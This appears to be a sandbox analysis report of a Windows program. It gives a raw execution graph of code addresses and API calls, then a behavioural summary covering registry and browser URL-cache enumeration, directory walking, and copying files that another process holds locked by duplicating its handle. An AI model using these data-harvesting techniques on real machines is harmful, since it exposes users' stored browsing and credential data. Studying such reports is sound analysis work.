                                                                                                                                                                                                                      Total number of Limit Nodes:69
                                                                                                                                                                                                                      execution_graph 40788 441819 40791 430737 40788->40791 40790 441825 40792 430756 40791->40792 40802 43076d 40791->40802 40793 430774 40792->40793 40794 43075f 40792->40794 40796 43034a memcpy 40793->40796 40805 4169a7 11 API calls 40794->40805 40799 43077e 40796->40799 40797 4307ce 40798 430819 memset 40797->40798 40800 415b2c 11 API calls 40797->40800 40798->40802 40799->40797 40799->40802 40803 4307fa 40799->40803 40801 4307e9 40800->40801 40801->40798 40801->40802 40802->40790 40806 4169a7 11 API calls 40803->40806 40805->40802 40806->40802 37674 442ec6 19 API calls 37850 4152c6 malloc 37851 4152e2 37850->37851 37852 4152ef 37850->37852 37854 416760 11 API calls 37852->37854 37854->37851 37855 4232e8 37856 4232ef 37855->37856 37859 415b2c 37856->37859 37858 423305 37860 415b42 37859->37860 37865 415b46 37859->37865 37861 415b94 37860->37861 37862 415b5a 37860->37862 37860->37865 37866 4438b5 37861->37866 37864 415b79 memcpy 37862->37864 37862->37865 37864->37865 37865->37858 37867 4438d0 37866->37867 37875 4438c9 37866->37875 37880 415378 memcpy memcpy 37867->37880 37875->37865 38523 4466f4 38542 446904 38523->38542 38525 446700 GetModuleHandleA 38528 446710 __set_app_type __p__fmode __p__commode 38525->38528 38527 4467a4 38529 4467ac __setusermatherr 38527->38529 38530 4467b8 38527->38530 38528->38527 38529->38530 38543 4468f0 _controlfp 38530->38543 38532 4467bd _initterm __wgetmainargs _initterm 38534 44681e GetStartupInfoW 38532->38534 38535 446810 38532->38535 38536 446866 GetModuleHandleA 38534->38536 38544 41276d 38536->38544 38540 446896 exit 38541 44689d _cexit 38540->38541 38541->38535 38542->38525 38543->38532 38545 41277d 38544->38545 38587 4044a4 LoadLibraryW 38545->38587 38547 412785 38579 412789 38547->38579 38595 414b81 38547->38595 
38550 4127c8 38601 412465 memset ??2@YAPAXI 38550->38601 38552 4127ea 38613 40ac21 38552->38613 38557 412813 38631 40dd07 memset 38557->38631 38558 412827 38636 40db69 memset 38558->38636 38561 412822 38657 4125b6 ??3@YAXPAX 38561->38657 38563 40ada2 _wcsicmp 38564 41283d 38563->38564 38564->38561 38567 412863 CoInitialize 38564->38567 38641 41268e 38564->38641 38661 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38567->38661 38571 41296f 38663 40b633 38571->38663 38574 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 38578 412957 38574->38578 38584 4128ca 38574->38584 38578->38561 38579->38540 38579->38541 38580 4128d0 TranslateAcceleratorW 38581 412941 GetMessageW 38580->38581 38580->38584 38581->38578 38581->38580 38582 412909 IsDialogMessageW 38582->38581 38582->38584 38583 4128fd IsDialogMessageW 38583->38581 38583->38582 38584->38580 38584->38582 38584->38583 38585 41292b TranslateMessage DispatchMessageW 38584->38585 38586 41291f IsDialogMessageW 38584->38586 38585->38581 38586->38581 38586->38585 38588 4044cf GetProcAddress 38587->38588 38591 4044f7 38587->38591 38589 4044e8 FreeLibrary 38588->38589 38592 4044df 38588->38592 38590 4044f3 38589->38590 38589->38591 38590->38591 38593 404507 MessageBoxW 38591->38593 38594 40451e 38591->38594 38592->38589 38593->38547 38594->38547 38596 414b8a 38595->38596 38597 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38595->38597 38667 40a804 memset 38596->38667 38597->38550 38600 414b9e GetProcAddress 38600->38597 38603 4124e0 38601->38603 38602 412505 ??2@YAPAXI 38604 41251c 38602->38604 38606 412521 38602->38606 38603->38602 38689 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38604->38689 38678 444722 38606->38678 38612 41259b wcscpy 38612->38552 38694 40b1ab ??3@YAXPAX ??3@YAXPAX 38613->38694 38617 40ad4b 38626 40ad76 38617->38626 38718 40a9ce 38617->38718 38618 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 38624 40ac5c 38618->38624 38620 40ace7 
??3@YAXPAX 38620->38624 38624->38617 38624->38618 38624->38620 38624->38626 38698 40a8d0 38624->38698 38710 4099f4 38624->38710 38625 40a8d0 7 API calls 38625->38626 38695 40aa04 38626->38695 38627 40ada2 38628 40adc9 38627->38628 38629 40adaa 38627->38629 38628->38557 38628->38558 38629->38628 38630 40adb3 _wcsicmp 38629->38630 38630->38628 38630->38629 38723 40dce0 38631->38723 38633 40dd3a GetModuleHandleW 38728 40dba7 38633->38728 38637 40dce0 3 API calls 38636->38637 38638 40db99 38637->38638 38800 40dae1 38638->38800 38814 402f3a 38641->38814 38643 412766 38643->38561 38643->38567 38644 4126d3 _wcsicmp 38645 4126a8 38644->38645 38645->38643 38645->38644 38647 41270a 38645->38647 38849 4125f8 7 API calls 38645->38849 38647->38643 38817 411ac5 38647->38817 38658 4125da 38657->38658 38659 4125f0 38658->38659 38660 4125e6 DeleteObject 38658->38660 38662 40b1ab ??3@YAXPAX ??3@YAXPAX 38659->38662 38660->38659 38661->38574 38662->38571 38664 40b640 38663->38664 38665 40b639 ??3@YAXPAX 38663->38665 38666 40b1ab ??3@YAXPAX ??3@YAXPAX 38664->38666 38665->38664 38666->38579 38668 40a83b GetSystemDirectoryW 38667->38668 38669 40a84c wcscpy 38667->38669 38668->38669 38674 409719 wcslen 38669->38674 38672 40a881 LoadLibraryW 38673 40a886 38672->38673 38673->38597 38673->38600 38675 409724 38674->38675 38676 409739 wcscat LoadLibraryW 38674->38676 38675->38676 38677 40972c wcscat 38675->38677 38676->38672 38676->38673 38677->38676 38679 444732 38678->38679 38680 444728 DeleteObject 38678->38680 38690 409cc3 38679->38690 38680->38679 38682 412551 38683 4010f9 38682->38683 38684 401130 38683->38684 38685 401134 GetModuleHandleW LoadIconW 38684->38685 38686 401107 wcsncat 38684->38686 38687 40a7be 38685->38687 38686->38684 38688 40a7d2 38687->38688 38688->38612 38688->38688 38689->38606 38693 409bfd memset wcscpy 38690->38693 38692 409cdb CreateFontIndirectW 38692->38682 38693->38692 38694->38624 38696 40aa14 38695->38696 38697 40aa0a ??3@YAXPAX 38695->38697 38696->38627 
38697->38696 38699 40a8eb 38698->38699 38700 40a8df wcslen 38698->38700 38701 40a906 ??3@YAXPAX 38699->38701 38702 40a90f 38699->38702 38700->38699 38703 40a919 38701->38703 38704 4099f4 3 API calls 38702->38704 38705 40a932 38703->38705 38706 40a929 ??3@YAXPAX 38703->38706 38704->38703 38708 4099f4 3 API calls 38705->38708 38707 40a93e memcpy 38706->38707 38707->38624 38709 40a93d 38708->38709 38709->38707 38711 409a41 38710->38711 38712 4099fb malloc 38710->38712 38711->38624 38714 409a37 38712->38714 38715 409a1c 38712->38715 38714->38624 38716 409a30 ??3@YAXPAX 38715->38716 38717 409a20 memcpy 38715->38717 38716->38714 38717->38716 38719 40a9e7 38718->38719 38720 40a9dc ??3@YAXPAX 38718->38720 38722 4099f4 3 API calls 38719->38722 38721 40a9f2 38720->38721 38721->38625 38722->38721 38747 409bca GetModuleFileNameW 38723->38747 38725 40dce6 wcsrchr 38726 40dcf5 38725->38726 38727 40dcf9 wcscat 38725->38727 38726->38727 38727->38633 38748 44db70 38728->38748 38732 40dbfd 38751 4447d9 38732->38751 38735 40dc34 wcscpy wcscpy 38777 40d6f5 38735->38777 38736 40dc1f wcscpy 38736->38735 38739 40d6f5 3 API calls 38740 40dc73 38739->38740 38741 40d6f5 3 API calls 38740->38741 38742 40dc89 38741->38742 38743 40d6f5 3 API calls 38742->38743 38744 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38743->38744 38783 40da80 38744->38783 38747->38725 38749 40dbb4 memset memset 38748->38749 38750 409bca GetModuleFileNameW 38749->38750 38750->38732 38753 4447f4 38751->38753 38752 40dc1b 38752->38735 38752->38736 38753->38752 38754 444807 ??2@YAPAXI 38753->38754 38755 44481f 38754->38755 38756 444873 _snwprintf 38755->38756 38757 4448ab wcscpy 38755->38757 38790 44474a 8 API calls 38756->38790 38759 4448bb 38757->38759 38791 44474a 8 API calls 38759->38791 38760 4448a7 38760->38757 38760->38759 38762 4448cd 38792 44474a 8 API calls 38762->38792 38764 4448e2 38793 44474a 8 API calls 38764->38793 38766 4448f7 38794 44474a 8 API calls 38766->38794 38768 44490c 38795 44474a 8 API 
calls 38768->38795 38770 444921 38796 44474a 8 API calls 38770->38796 38772 444936 38797 44474a 8 API calls 38772->38797 38774 44494b 38798 44474a 8 API calls 38774->38798 38776 444960 ??3@YAXPAX 38776->38752 38778 44db70 38777->38778 38779 40d702 memset GetPrivateProfileStringW 38778->38779 38780 40d752 38779->38780 38781 40d75c WritePrivateProfileStringW 38779->38781 38780->38781 38782 40d758 38780->38782 38781->38782 38782->38739 38784 44db70 38783->38784 38785 40da8d memset 38784->38785 38786 40daac LoadStringW 38785->38786 38787 40dac6 38786->38787 38787->38786 38789 40dade 38787->38789 38799 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38787->38799 38789->38561 38790->38760 38791->38762 38792->38764 38793->38766 38794->38768 38795->38770 38796->38772 38797->38774 38798->38776 38799->38787 38810 409b98 GetFileAttributesW 38800->38810 38802 40daea 38803 40db63 38802->38803 38804 40daef wcscpy wcscpy GetPrivateProfileIntW 38802->38804 38803->38563 38811 40d65d GetPrivateProfileStringW 38804->38811 38806 40db3e 38812 40d65d GetPrivateProfileStringW 38806->38812 38808 40db4f 38813 40d65d GetPrivateProfileStringW 38808->38813 38810->38802 38811->38806 38812->38808 38813->38803 38850 40eaff 38814->38850 38818 411ae2 memset 38817->38818 38819 411b8f 38817->38819 38890 409bca GetModuleFileNameW 38818->38890 38831 411a8b 38819->38831 38821 411b0a wcsrchr 38822 411b22 wcscat 38821->38822 38823 411b1f 38821->38823 38891 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38822->38891 38823->38822 38825 411b67 38892 402afb 38825->38892 38829 411b7f 38948 40ea13 SendMessageW memset SendMessageW 38829->38948 38832 402afb 27 API calls 38831->38832 38833 411ac0 38832->38833 38834 4110dc 38833->38834 38835 41113e 38834->38835 38840 4110f0 38834->38840 38973 40969c LoadCursorW SetCursor 38835->38973 38837 411143 38847 40b633 ??3@YAXPAX 38837->38847 38974 4032b4 38837->38974 38992 444a54 38837->38992 38838 4110f7 _wcsicmp 38838->38840 38839 
411157 38841 40ada2 _wcsicmp 38839->38841 38840->38835 38840->38838 38995 410c46 10 API calls 38840->38995 38844 411167 38841->38844 38842 4111af 38844->38842 38845 4111a6 qsort 38844->38845 38845->38842 38847->38839 38849->38645 38851 40eb10 38850->38851 38863 40e8e0 38851->38863 38854 40eb6c memcpy memcpy 38861 40ebb7 38854->38861 38855 40ebf2 ??2@YAPAXI ??2@YAPAXI 38857 40ec2e ??2@YAPAXI 38855->38857 38859 40ec65 38855->38859 38856 40d134 16 API calls 38856->38861 38857->38859 38859->38859 38873 40ea7f 38859->38873 38861->38854 38861->38855 38861->38856 38862 402f49 38862->38645 38864 40e8f2 38863->38864 38865 40e8eb ??3@YAXPAX 38863->38865 38866 40e900 38864->38866 38867 40e8f9 ??3@YAXPAX 38864->38867 38865->38864 38868 40e911 38866->38868 38869 40e90a ??3@YAXPAX 38866->38869 38867->38866 38870 40e931 ??2@YAPAXI ??2@YAPAXI 38868->38870 38871 40e921 ??3@YAXPAX 38868->38871 38872 40e92a ??3@YAXPAX 38868->38872 38869->38868 38870->38854 38871->38872 38872->38870 38874 40aa04 ??3@YAXPAX 38873->38874 38875 40ea88 38874->38875 38876 40aa04 ??3@YAXPAX 38875->38876 38877 40ea90 38876->38877 38878 40aa04 ??3@YAXPAX 38877->38878 38879 40ea98 38878->38879 38880 40aa04 ??3@YAXPAX 38879->38880 38881 40eaa0 38880->38881 38882 40a9ce 4 API calls 38881->38882 38883 40eab3 38882->38883 38884 40a9ce 4 API calls 38883->38884 38885 40eabd 38884->38885 38886 40a9ce 4 API calls 38885->38886 38887 40eac7 38886->38887 38888 40a9ce 4 API calls 38887->38888 38889 40ead1 38888->38889 38889->38862 38890->38821 38891->38825 38949 40b2cc 38892->38949 38894 402b0a 38895 40b2cc 27 API calls 38894->38895 38896 402b23 38895->38896 38897 40b2cc 27 API calls 38896->38897 38898 402b3a 38897->38898 38899 40b2cc 27 API calls 38898->38899 38900 402b54 38899->38900 38901 40b2cc 27 API calls 38900->38901 38902 402b6b 38901->38902 38903 40b2cc 27 API calls 38902->38903 38904 402b82 38903->38904 38905 40b2cc 27 API calls 38904->38905 38906 402b99 38905->38906 38907 40b2cc 27 API calls 38906->38907 38908 
402bb0 38907->38908 38909 40b2cc 27 API calls 38908->38909 38910 402bc7 38909->38910 38911 40b2cc 27 API calls 38910->38911 38912 402bde 38911->38912 38913 40b2cc 27 API calls 38912->38913 38914 402bf5 38913->38914 38915 40b2cc 27 API calls 38914->38915 38916 402c0c 38915->38916 38917 40b2cc 27 API calls 38916->38917 38918 402c23 38917->38918 38919 40b2cc 27 API calls 38918->38919 38920 402c3a 38919->38920 38921 40b2cc 27 API calls 38920->38921 38922 402c51 38921->38922 38923 40b2cc 27 API calls 38922->38923 38924 402c68 38923->38924 38925 40b2cc 27 API calls 38924->38925 38926 402c7f 38925->38926 38927 40b2cc 27 API calls 38926->38927 38928 402c99 38927->38928 38929 40b2cc 27 API calls 38928->38929 38930 402cb3 38929->38930 38931 40b2cc 27 API calls 38930->38931 38932 402cd5 38931->38932 38933 40b2cc 27 API calls 38932->38933 38934 402cf0 38933->38934 38935 40b2cc 27 API calls 38934->38935 38936 402d0b 38935->38936 38937 40b2cc 27 API calls 38936->38937 38938 402d26 38937->38938 38939 40b2cc 27 API calls 38938->38939 38940 402d3e 38939->38940 38941 40b2cc 27 API calls 38940->38941 38942 402d59 38941->38942 38943 40b2cc 27 API calls 38942->38943 38944 402d78 38943->38944 38945 40b2cc 27 API calls 38944->38945 38946 402d93 38945->38946 38947 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38946->38947 38947->38829 38948->38819 38952 40b58d 38949->38952 38951 40b2d1 38951->38894 38953 40b5a4 GetModuleHandleW FindResourceW 38952->38953 38954 40b62e 38952->38954 38955 40b5c2 LoadResource 38953->38955 38957 40b5e7 38953->38957 38954->38951 38956 40b5d0 SizeofResource LockResource 38955->38956 38955->38957 38956->38957 38957->38954 38965 40afcf 38957->38965 38959 40b608 memcpy 38968 40b4d3 memcpy 38959->38968 38961 40b61e 38969 40b3c1 18 API calls 38961->38969 38963 40b626 38970 40b04b 38963->38970 38966 40b04b ??3@YAXPAX 38965->38966 38967 40afd7 ??2@YAPAXI 38966->38967 38967->38959 38968->38961 38969->38963 38971 40b051 ??3@YAXPAX 
38970->38971 38972 40b05f 38970->38972 38971->38972 38972->38954 38973->38837 38975 4032c4 38974->38975 38976 40b633 ??3@YAXPAX 38975->38976 38977 403316 38976->38977 38996 44553b 38977->38996 38981 403480 39192 40368c 15 API calls 38981->39192 38983 403489 38984 40b633 ??3@YAXPAX 38983->38984 38985 403495 38984->38985 38985->38839 38986 4033a9 memset memcpy 38987 4033ec wcscmp 38986->38987 38988 40333c 38986->38988 38987->38988 38988->38981 38988->38986 38988->38987 39190 4028e7 11 API calls 38988->39190 39191 40f508 6 API calls 38988->39191 38990 403421 _wcsicmp 38990->38988 38993 444a64 FreeLibrary 38992->38993 38994 444a83 38992->38994 38993->38994 38994->38839 38995->38840 38997 445548 38996->38997 38998 445599 38997->38998 39193 40c768 38997->39193 38999 4455a8 memset 38998->38999 39006 4457f2 38998->39006 39276 403988 38999->39276 39009 445854 39006->39009 39378 403e2d memset memset memset memset memset 39006->39378 39007 4458bb memset memset 39013 414c2e 16 API calls 39007->39013 39059 4458aa 39009->39059 39401 403c9c memset memset memset memset memset 39009->39401 39011 44595e memset memset 39019 414c2e 16 API calls 39011->39019 39012 4455e5 39016 445672 39012->39016 39022 44560f 39012->39022 39014 4458f9 39013->39014 39020 40b2cc 27 API calls 39014->39020 39287 403fbe memset memset memset memset memset 39016->39287 39017 445a00 memset memset 39424 414c2e 39017->39424 39018 445b22 39024 445bca 39018->39024 39025 445b38 memset memset memset 39018->39025 39029 44599c 39019->39029 39030 445909 39020->39030 39033 4087b3 338 API calls 39022->39033 39023 445849 39488 40b1ab ??3@YAXPAX ??3@YAXPAX 39023->39488 39031 445c8b memset memset 39024->39031 39098 445cf0 39024->39098 39034 445bd4 39025->39034 39035 445b98 39025->39035 39038 40b2cc 27 API calls 39029->39038 39039 409d1f 6 API calls 39030->39039 39042 414c2e 16 API calls 39031->39042 39032 44589f 39489 40b1ab ??3@YAXPAX ??3@YAXPAX 39032->39489 39040 445621 39033->39040 39048 414c2e 16 API calls 39034->39048 
39035->39034 39044 445ba2 39035->39044 39041 4459ac 39038->39041 39052 445919 39039->39052 39474 4454bf 20 API calls 39040->39474 39054 409d1f 6 API calls 39041->39054 39055 445cc9 39042->39055 39562 4099c6 wcslen 39044->39562 39047 40b2cc 27 API calls 39060 445a4f 39047->39060 39062 445be2 39048->39062 39049 403335 39189 4452e5 45 API calls 39049->39189 39050 445d3d 39082 40b2cc 27 API calls 39050->39082 39051 445d88 memset memset memset 39065 414c2e 16 API calls 39051->39065 39490 409b98 GetFileAttributesW 39052->39490 39053 445823 39053->39023 39064 4087b3 338 API calls 39053->39064 39066 4459bc 39054->39066 39067 409d1f 6 API calls 39055->39067 39057 445879 39057->39032 39078 4087b3 338 API calls 39057->39078 39059->39007 39083 44594a 39059->39083 39439 409d1f wcslen wcslen 39060->39439 39071 40b2cc 27 API calls 39062->39071 39064->39053 39075 445dde 39065->39075 39558 409b98 GetFileAttributesW 39066->39558 39077 445ce1 39067->39077 39068 445bb3 39565 445403 memset 39068->39565 39072 445bf3 39071->39072 39081 409d1f 6 API calls 39072->39081 39073 445928 39073->39083 39491 40b6ef 39073->39491 39084 40b2cc 27 API calls 39075->39084 39582 409b98 GetFileAttributesW 39077->39582 39078->39057 39092 445c07 39081->39092 39093 445d54 _wcsicmp 39082->39093 39083->39011 39097 4459ed 39083->39097 39096 445def 39084->39096 39085 4459cb 39085->39097 39106 40b6ef 252 API calls 39085->39106 39089 40b2cc 27 API calls 39090 445a94 39089->39090 39444 40ae18 39090->39444 39091 44566d 39091->39006 39361 413d4c 39091->39361 39102 445389 258 API calls 39092->39102 39103 445d71 39093->39103 39168 445d67 39093->39168 39095 445665 39475 40b1ab ??3@YAXPAX ??3@YAXPAX 39095->39475 39104 409d1f 6 API calls 39096->39104 39097->39017 39097->39018 39098->39049 39098->39050 39098->39051 39099 445389 258 API calls 39099->39024 39108 445c17 39102->39108 39583 445093 23 API calls 39103->39583 39111 445e03 39104->39111 39106->39097 39107 4456d8 39113 40b2cc 27 API calls 39107->39113 39114 40b2cc 27 
API calls 39108->39114 39110 44563c 39110->39095 39116 4087b3 338 API calls 39110->39116 39584 409b98 GetFileAttributesW 39111->39584 39112 40b6ef 252 API calls 39112->39049 39118 4456e2 39113->39118 39119 445c23 39114->39119 39115 445d83 39115->39049 39116->39110 39477 413fa6 _wcsicmp _wcsicmp 39118->39477 39123 409d1f 6 API calls 39119->39123 39121 445e12 39128 445e6b 39121->39128 39134 40b2cc 27 API calls 39121->39134 39126 445c37 39123->39126 39124 445aa1 39127 445b17 39124->39127 39142 445ab2 memset 39124->39142 39155 409d1f 6 API calls 39124->39155 39451 40add4 39124->39451 39456 445389 39124->39456 39465 40ae51 39124->39465 39125 4456eb 39130 4456fd memset memset memset memset 39125->39130 39131 4457ea 39125->39131 39132 445389 258 API calls 39126->39132 39559 40aebe 39127->39559 39586 445093 23 API calls 39128->39586 39478 409c70 wcscpy wcsrchr 39130->39478 39481 413d29 39131->39481 39137 445c47 39132->39137 39138 445e33 39134->39138 39144 40b2cc 27 API calls 39137->39144 39145 409d1f 6 API calls 39138->39145 39140 445e7e 39141 445f67 39140->39141 39150 40b2cc 27 API calls 39141->39150 39146 40b2cc 27 API calls 39142->39146 39148 445c53 39144->39148 39149 445e47 39145->39149 39146->39124 39147 409c70 2 API calls 39151 44577e 39147->39151 39152 409d1f 6 API calls 39148->39152 39585 409b98 GetFileAttributesW 39149->39585 39154 445f73 39150->39154 39156 409c70 2 API calls 39151->39156 39157 445c67 39152->39157 39159 409d1f 6 API calls 39154->39159 39155->39124 39161 445389 258 API calls 39157->39161 39158 445e56 39158->39128 39164 445e83 memset 39158->39164 39162 445f87 39159->39162 39161->39024 39589 409b98 GetFileAttributesW 39162->39589 39166 40b2cc 27 API calls 39164->39166 39169 445eab 39166->39169 39168->39049 39168->39112 39171 409d1f 6 API calls 39169->39171 39173 445ebf 39171->39173 39175 40ae18 9 API calls 39173->39175 39185 445ef5 39175->39185 39178 40ae51 9 API calls 39178->39185 39180 445f5c 39182 40aebe FindClose 39180->39182 39181 40add4 2 API 
calls 39181->39185 39182->39141 39183 40b2cc 27 API calls 39183->39185 39184 409d1f 6 API calls 39184->39185 39185->39178 39185->39180 39185->39181 39185->39183 39185->39184 39187 445f3a 39185->39187 39587 409b98 GetFileAttributesW 39185->39587 39588 445093 23 API calls 39187->39588 39189->38988 39190->38990 39191->38988 39192->38983 39194 40c775 39193->39194 39590 40b1ab ??3@YAXPAX ??3@YAXPAX 39194->39590 39196 40c788 39591 40b1ab ??3@YAXPAX ??3@YAXPAX 39196->39591 39198 40c790 39592 40b1ab ??3@YAXPAX ??3@YAXPAX 39198->39592 39200 40c798 39201 40aa04 ??3@YAXPAX 39200->39201 39202 40c7a0 39201->39202 39593 40c274 memset 39202->39593 39207 40a8ab 9 API calls 39208 40c7c3 39207->39208 39209 40a8ab 9 API calls 39208->39209 39210 40c7d0 39209->39210 39622 40c3c3 39210->39622 39214 40c7e5 39215 40c877 39214->39215 39216 40c86c 39214->39216 39222 40c634 49 API calls 39214->39222 39647 40a706 39214->39647 39223 40bdb0 39215->39223 39664 4053fe 39 API calls 39216->39664 39222->39214 39854 404363 39223->39854 39277 40399d 39276->39277 39920 403a16 39277->39920 39279 403a09 39934 40b1ab ??3@YAXPAX ??3@YAXPAX 39279->39934 39281 403a12 wcsrchr 39281->39012 39282 4039a3 39282->39279 39285 4039f4 39282->39285 39931 40a02c CreateFileW 39282->39931 39285->39279 39286 4099c6 2 API calls 39285->39286 39286->39279 39288 414c2e 16 API calls 39287->39288 39289 404048 39288->39289 39290 414c2e 16 API calls 39289->39290 39291 404056 39290->39291 39292 409d1f 6 API calls 39291->39292 39293 404073 39292->39293 39294 409d1f 6 API calls 39293->39294 39295 40408e 39294->39295 39296 409d1f 6 API calls 39295->39296 39297 4040a6 39296->39297 39298 403af5 20 API calls 39297->39298 39299 4040ba 39298->39299 39300 403af5 20 API calls 39299->39300 39301 4040cb 39300->39301 39961 40414f memset 39301->39961 39303 404140 39305 4040ec memset 39308 4040e0 39305->39308 39307 4099c6 2 API calls 39307->39308 39308->39303 39308->39305 39308->39307 39309 40a8ab 9 API calls 39308->39309 39309->39308 39362 
40b633 ??3@YAXPAX 39361->39362 39363 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39362->39363 39364 413f00 Process32NextW 39363->39364 39365 413da5 OpenProcess 39364->39365 39366 413f17 CloseHandle 39364->39366 39367 413df3 memset 39365->39367 39370 413eb0 39365->39370 39366->39107 40228 413f27 39367->40228 39369 413ebf ??3@YAXPAX 39369->39370 39370->39364 39370->39369 39371 4099f4 3 API calls 39370->39371 39371->39370 39373 413e37 GetModuleHandleW 39374 413e1f 39373->39374 39375 413e46 GetProcAddress 39373->39375 39374->39373 40233 413959 39374->40233 40249 413ca4 39374->40249 39375->39374 39377 413ea2 CloseHandle 39377->39370 39379 414c2e 16 API calls 39378->39379 39380 403eb7 39379->39380 39381 414c2e 16 API calls 39380->39381 39382 403ec5 39381->39382 39383 409d1f 6 API calls 39382->39383 39384 403ee2 39383->39384 39385 409d1f 6 API calls 39384->39385 39386 403efd 39385->39386 39387 409d1f 6 API calls 39386->39387 39388 403f15 39387->39388 39389 403af5 20 API calls 39388->39389 39390 403f29 39389->39390 39391 403af5 20 API calls 39390->39391 39392 403f3a 39391->39392 39393 40414f 33 API calls 39392->39393 39398 403f4f 39393->39398 39394 403faf 40263 40b1ab ??3@YAXPAX ??3@YAXPAX 39394->40263 39396 403f5b memset 39396->39398 39397 403fb7 39397->39053 39398->39394 39398->39396 39399 4099c6 2 API calls 39398->39399 39400 40a8ab 9 API calls 39398->39400 39399->39398 39400->39398 39402 414c2e 16 API calls 39401->39402 39403 403d26 39402->39403 39404 414c2e 16 API calls 39403->39404 39405 403d34 39404->39405 39406 409d1f 6 API calls 39405->39406 39407 403d51 39406->39407 39408 409d1f 6 API calls 39407->39408 39409 403d6c 39408->39409 39410 409d1f 6 API calls 39409->39410 39411 403d84 39410->39411 39412 403af5 20 API calls 39411->39412 39413 403d98 39412->39413 39414 403af5 20 API calls 39413->39414 39415 403da9 39414->39415 39416 40414f 33 API calls 39415->39416 39417 403dbe 39416->39417 39418 403e1e 39417->39418 39419 403dca memset 39417->39419 39422 
Execution Graph

The remainder of this section was the serialized execution graph of the sample. In that dump every node is an internal report id, a code address in the sample (all in the 0x40xxxx range) and the Win32 / CRT APIs that code calls directly; "N API calls" marks a collapsed subgraph whose APIs are not listed; "A->B" entries are call edges between node ids. The ids mean nothing outside the report, so only the address-to-API pairs and the call chains they form are kept here, grouped by behaviour.

Registry access
414592 RegOpenKeyExW, 4145ac RegQueryValueExW, 414ce9 RegCloseKey, 414bb0 / 414cf4 wcscpy: read one named value. This is wrapped by 414c2e (16 API calls; it also calls 409cf9 GetVersionExW through 409cea), which 40c2ae, 40e5ed and 403bed use to resolve paths.
40c3dd -> 414592 RegOpenKeyExW -> 40a9ce (4 API calls) -> 40c418 memset -> 40aa23 RegEnumValueW -> 40c47a _wcsupr -> 40a8d0 (7 API calls), looping until 40c505 RegCloseKey: enumerates every value under a key and upper-cases each name before handing it on.

WinINet URL cache enumeration
40c2d8 -> 40afcf (operator new / delete) -> 40c2fd FindFirstUrlCacheEntryW -> 40c31e / 40c33e wcschr -> 40c35e FindNextUrlCacheEntryW, looping back to 40c31e. When FindNextUrlCacheEntryW fails, 40c373 GetLastError either reallocates the entry buffer (40afcf) and retries at 40c391 FindNextUrlCacheEntryW or finishes with 40c3ad FindCloseUrlCache. Each entry goes through 40a8ab (9 API calls), whose comparison loop 40a97a uses 40a995 _wcsicmp and 40a99c wcscmp.

Directory traversal
40ae5c FindFirstFileW, 40ae7b FindNextFileW, 40aebe / 40aec7 FindClose; 40add4 applies wcscmp twice to each name (40ade7, 40adfe), the shape of a "." and ".." filter. 40c1d3 (35 API calls) is a recursive walker on these nodes that compares names with 40c231 _wcsicmp and hands matches to 40c084 (22 API calls); 445403 (253 API calls), 4453c4 and 403af5 (20 API calls) are further walkers on the same nodes. Paths are assembled by 409d1f (6 API calls), 409d43 wcscpy and 409d51 wcscat.

Copying a file held open by another process
40e01e -> 406214 (22 API calls) -> 40dd85 (74 API calls) -> 40e08d OpenProcess -> 40e0a4 GetCurrentProcess, DuplicateHandle -> 40e0d0 GetFileSize -> 409a45 GetTempPathW, GetWindowsDirectoryW, GetTempFileNameW -> 4096dc CreateFileW -> 40e0f1 CreateFileMappingW -> 40e10b MapViewOfFile -> 40e11f WriteFile, UnmapViewOfFile -> 40e13b, 40e140, 40e14a handle close. A handle to a file that another process has open is duplicated into this process, mapped, and its contents written to a fresh temp file, which is the usual way to read a file its owner opened without share access. The temp copy is then parsed by 40e175 and 40e2ab (406b53 SetFilePointerEx, ReadFile; 40dd50 _wcsicmp; 40e244 _snwprintf; 40aae3 wcslen, wcslen, _memicmp; 40e3b3 wcschr; 40e3e0, 40e3fb, 40e416, 40e431 memcpy) and removed with 40e59c DeleteFileW. 40e5ed reaches this chain (40e4b2) after resolving a path through 414c2e and checking it with 409b98 GetFileAttributesW, and continues into the URL cache enumeration at 40c2d8.

Copy-then-parse of a file by path
40b6ef (252 API calls): 40b732 wcsrchr -> 40b2cc (27 API calls) -> 409b98 GetFileAttributesW -> 40b7d4 memset, CreateFileW; on the other branch 409a45 GetTempPathW, GetTempFileNameW -> 40b827 CopyFileW copies the target to a temp file first. The data is converted with 40a6e6 WideCharToMultiByte, handed to 444432 (121 API calls) and the parsers 4251c4 (137), 4253ef, 425413 / 4253af / 4253cf (17 each) and 404423 (37), compared with 40b9b5 / 40ba5f memcmp, timestamps converted by 40b64c (40b697 SystemTimeToFileTime, 40b6d6 FileTimeToLocalFileTime), buffers released with 40bb88 LocalFree, and the temp copy removed by 40bade DeleteFileW. 44543f / 445476 call it twice, each time after a 409b98 GetFileAttributesW check.
40bb98 parses a text file read whole by 40cc26 (4096c3 CreateFileW -> 40cc3d GetFileSize -> 40a2ef ReadFile -> 40ab4a / 40ab7c MultiByteToWideChar): 40cf04 and 40cd4b split it (40abb7 wcslen, memmove; 40aa71 wcslen; 40d00b malloc, memcpy), 40ccf0 / 40cd26 _wcsicmp match keys, and the matched value is narrowed with 40bc61 WideCharToMultiByte, measured with 40103c strlen and compared with 40bcd0 memcmp.

Other file handling
409b98 GetFileAttributesW guards most file operations; 40a051 GetFileTime and 4039ca CompareFileTime (403a29 / 403bed builds two registry-derived paths with 403c3f and 403c68 wcscat, walks them with 403af5 and compares timestamps); 417570 SetFilePointer and 41760a ReadFile, each followed by GetLastError (41759c, 4175a8, 417627); 417bf6 UnmapViewOfFile, CloseHandle; 4175d6 FindCloseChangeNotification retried from 4175ce Sleep until it succeeds.
Caveat: where FindCloseChangeNotification appears next to a file or mapping handle (40b837, 40cc95, 40e13b, 40e57c, 4175d6, 40a051) it is almost certainly CloseHandle; the two kernel32 exports resolve to the same code, so a symbolizer may report either name.

Process and module introspection
